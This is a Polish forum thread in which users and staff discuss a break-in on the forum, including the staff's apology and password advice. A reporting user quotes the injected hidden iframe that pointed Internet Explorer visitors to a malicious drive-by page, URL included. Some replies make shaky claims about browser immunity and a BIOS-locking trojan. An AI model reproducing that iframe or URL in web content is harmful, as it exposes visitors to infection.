Włam na forum!?, Wczoraj... 22.00 :| ?????? Opcje

[Master Miko]

Co się wczoraj stało! Wchodzę na forum... (przez IE) patrzę, nagle pojawia się monit skryptu... i jakiś dziwny kod. Zacina się... firewall wybucha świszczy i promieniuje głęboką czerwienią...
wypluwając:

Kod

IP: 85.249.19.122
PORT: TCP
[362] MS WMF Code Exec Attempt Detected (CVE-2005-4560)

Wlazłem FIrefoxem... nic się nie pojawiło poza... Nie można połączyć się z domeną "http://2-extreme.biz/traff.php?adv=53" (BROŃ BOŻE NIE WCHODZIĆ TAM)

Zaintrygował mnie mały kwadracik na górze forum... był to iframe o treści:

[HTML] pobierz, plaintext 
<iframe src="http://2-extreme.biz/traff.php?adv=53" width=1 height=1></iframe>
[HTML] pobierz, plaintext 

Umieszczony dokładnie nad doctype.

Jak on się tam dostał?! Jak to się stało?! Jakim sposbem :|

Mam farta.. (i firewalla), bo naszczęście miałem dobre zabezpieczenia.. ale tak to mój komp byłby teraz... zainfekowany... to było dosyć niebezpieczne :/

(IMG:http://forum.php.pl/style_emoticons/default/ohmy.gif)

[seaquest]

Wiemy, już zlikwidowaliśmy i zabezpieczyliśmy.

[Master Miko]

Cieszę się bardzo, że ekipa forum php jest bardzo szybka. Praktycznie 15 minut po zgłoszeniu wszystko było ok! Brawo.

Ale jednak pojawił się problem... który był dość niebezpieczny. Stałem się taki mniej pewny przez to wydarzenie... imo dziwne to było :|

[nospor]

Doskonale Cię rozumiem Master Miko. Postaramy się niedługo udzielic więcej informacji na ten temat, jak już tylko zbadamy dokladnie logi i bedziemy mieli pewność co i jak. Póki co nie chcemy na wyrost nic mówić, by potem nie bylo, ze cos źle mowimy lub wprowadzamy specjalnie w błąd.

ps: dziękuje z tego miejsca Tobie i innym osobom, za szybką reakcję, po zobaczeniu nieprawidłowości

[kosheen2k]

dokładnie miałem to samo, ale niestety mój Kerio Personal Firewall nie dał sobie rady... zdążylem też zauwazyć ten intrygujący kwadracik i nagle zwiecha komputera i restart...

[Zajec]

Dzwię się, że po takich akcjach ludzie jeszcze wracają do IE :-) Używajcie sobie na stałe Opery/Firefoksa, które są po prostu niepodatne na jakieś tam "wirusy" stronowe (IMG:http://forum.php.pl/style_emoticons/default/cool.gif)

[Master Miko]

Ten wirus został zaprojektowany specjalnie na internet explorer. Wchodziłem na strone zhackowaną przez Firefoxa pojawiało się strona niedostępna. Równie dobrze można było zrobić hacka na firefoxa lub operę....

a dlaczego tylko na IE? pewnie znacie odpowiedź...

[sf]

a dlaczego tylko na IE? pewnie znacie odpowiedź...

Bo kto nie jest z nami jest przeciwko nam. (IMG:http://forum.php.pl/style_emoticons/default/ph34r.gif) Wszyscy, którzy używaja IE pożałują! (IMG:http://forum.php.pl/style_emoticons/default/axesmiley.png)

[GrayHat]

heh php.pl chcialo zarobic co?? takie serwisy placa do 10€ za 1000 zainfekowanych kompow (IMG:http://forum.php.pl/style_emoticons/default/winksmiley.jpg) na webhelp jest dyskusja na ten temat (IMG:http://forum.php.pl/style_emoticons/default/winksmiley.jpg)

[DeyV]

Ooby które ucierpiały z powodu naszych problemów serdecznie przepraszamy.

Jest to jednak tylko jeszcze jeden przykład tego, że każdy komputer powinien być zaopatrzony w program antywirusowy - choćby w darmowego Avasta...

[NuLL]

Ja nie mam nic (IMG:http://forum.php.pl/style_emoticons/default/sad.gif) Ba - mam nawet zablokowany dostep do BIOSu w kompie.

Ktos sie orientuje czym to gowno mozna usunac (IMG:http://forum.php.pl/style_emoticons/default/questionmark.gif) Bo chcialbym chociaz czesc danych w miare mozliwosci.

[Slump]

NuLL moze i glupia propozycja a resetowales biosa??

Tak tylko pytam (IMG:http://forum.php.pl/style_emoticons/default/smile.gif)

[NuLL]

Mam laptopa - nie wiem nawet jak to sie robi - bede musial pokombinowac. Bios to i tak pol biedy - moje dane - praca i wszystko
(IMG:http://forum.php.pl/style_emoticons/default/sad.gif)

[strife]

Mam laptopa - nie wiem nawet jak to sie robi - bede musial pokombinowac. Bios to i tak pol biedy - moje dane - praca i wszystko
(IMG:http://forum.php.pl/style_emoticons/default/sad.gif)

Współczuje Ci, ja jakiś miesiąc dwa też miałem awarię, jednak spowodowaną eksperymentami z linuxem, straciłem 40 GB muzyki, filmów, i co najważnejsze sporo cennych danych. (IMG:http://forum.php.pl/style_emoticons/default/sad.gif)

Szukałem trochę o trojanie jednak żadnych konkretnych informacji nie znalazłem, dziwi mnie to, że trojan ustawił Ci hasło na BIOS - jeszcze o takim przypadku nie słyszałem.

Teraz mogą Ci jedynie pomóc programy, które odzyskują sformatowane partycje, żadnego polecić nie mogę bo żaden mi nie działał tak jakbym chciał (IMG:http://forum.php.pl/style_emoticons/default/sad.gif)

Jak coś znajdę dam znać :]

Pozdrawiam (IMG:http://forum.php.pl/style_emoticons/default/smile.gif)

[NuLL]

Thx za troske (IMG:http://forum.php.pl/style_emoticons/default/smile.gif)

Osobiscie myslalem ze format bedzie - bo zamienilem dyski laptopowe i instaluje sobie obecnie nowego (IMG:http://forum.php.pl/style_emoticons/default/smile.gif)

Myslalem aby sie poratowac linuxem

Ale...

Zadzwonilem do pewnej osoby czyli administratora microsoftu (IMG:http://forum.php.pl/style_emoticons/default/biggrin.gif) i co mi powiedzial :

-> zainstal sobie uczelnianego 2k3 Server na NTFSie
-> podepnij dysk z laptopa na USB do kompa stacjonarnego
-> zabron programom z laptopowego dysku dostepu do pamieci i dysku z 2k3 Server
-> wywal ten folder, nastepny - tak chyba z 400 MB folderow systemowych windowsa oraz tych z 'Documents and Settings'
-> podepnij dysk

i sprawdz...

DZIALA (IMG:http://forum.php.pl/style_emoticons/default/biggrin.gif)

Co do trojanow BIOSowych - to mozliwe - podobnie jak z poziomu Windowsa jest mozliwa aktualizacja BIOSu

[Fo]

W związku z ostatnim włamaniem na php.pl i rozesłaniem e-maili z adresem do zainfekowanego pliku ekipa php.pl chce przeprosić za wszystkie problemy powstałe w ten sposób.

W wyniku ataku dodano też do kodu forum ramkę, która u użytkowników przeglądarki Internet Explorer spowodowała wejście na zainfekowaną stronę. Poza tym zamieniono też adresy w jednym z tematów na prowadzące do zainfekowanego pliku wykonalnego.

Musimy przyznać, że do włamania doszło ze względu na słabe hasło jednego z naszych administratorów. Dlatego też zachęcamy do zmiany hasła na mocne (co najmniej 8 znaków, duże i małe litery, cyfry, znaki specjalne). Hasła typu: dom, qwerty, login itp nie są bezpieczne.

Chcę podkreślić, że wszystkie hasła zostały wzmocnione, a na całą sieć, z której pochodził atak nałożony został ban. Zostały też wzmocnione zabezpieczenia serwera, a do skryptu forum dopisano modyfikację, która wymaga podania dodatkowego hasła w celu wysłania wiadomości do wszystkich użytkowników.

Jeszcze raz serdecznie przepraszamy.
...

wlasnie dostalem takiego maila z przeprosinami,
hmm jak najbardziej na miejscu - szczegolnie dla tych ktorzy sie nacieli,
ale czy naprawde panowie nie uwazacie ze do kwestii bezpieczenstwa powinno sie podejsc nieco inaczej niz ban na cala klase adresow z ktorych bylo/moglo byc polaczenie ?

[info] nie chce byc odebrany jako jakis natret, albo cus, ale mam wrazenie ze taka reakcja to raczej jeden sik z hydrantu w plonacy budynek... hmm, on dalej po chwili bedzie plonac [/info]

[Radarek]

A mnie osobiscie dziwi to 'słabe hasło jednego z naszych administratorów'. Nie wiem czy to jeden z uzytkownikow tego forum, ale jakies pojecie o haslach powiniem miec. Bez przesady...

[aleksander]

przyznac sie ktory to:D bedzie publiczne biczowanie:D

[strife]

A mnie osobiscie dziwi to 'słabe hasło jednego z naszych administratorów'. Nie wiem czy to jeden z uzytkownikow tego forum, ale jakies pojecie o haslach powiniem miec. Bez przesady...

A ja to zrozumiałem, że "słabe" w sensie, że nie wystarczyło bo jednak był włam. Każde zabezpieczenie wydające się nam najlepsze może się okazać za "słabe" jak ktoś je złamie. Tak to odebrałem:)

Przecież administrator to też człowiek ( chyba (IMG:http://forum.php.pl/style_emoticons/default/tongue.gif) ).

[GrayHat]

bierzcie przyklad ze mnie (IMG:http://forum.php.pl/style_emoticons/default/winksmiley.jpg) 18 znakow: 6 cyfr, 6 liter malych i 6 liter wielkich (IMG:http://forum.php.pl/style_emoticons/default/winksmiley.jpg)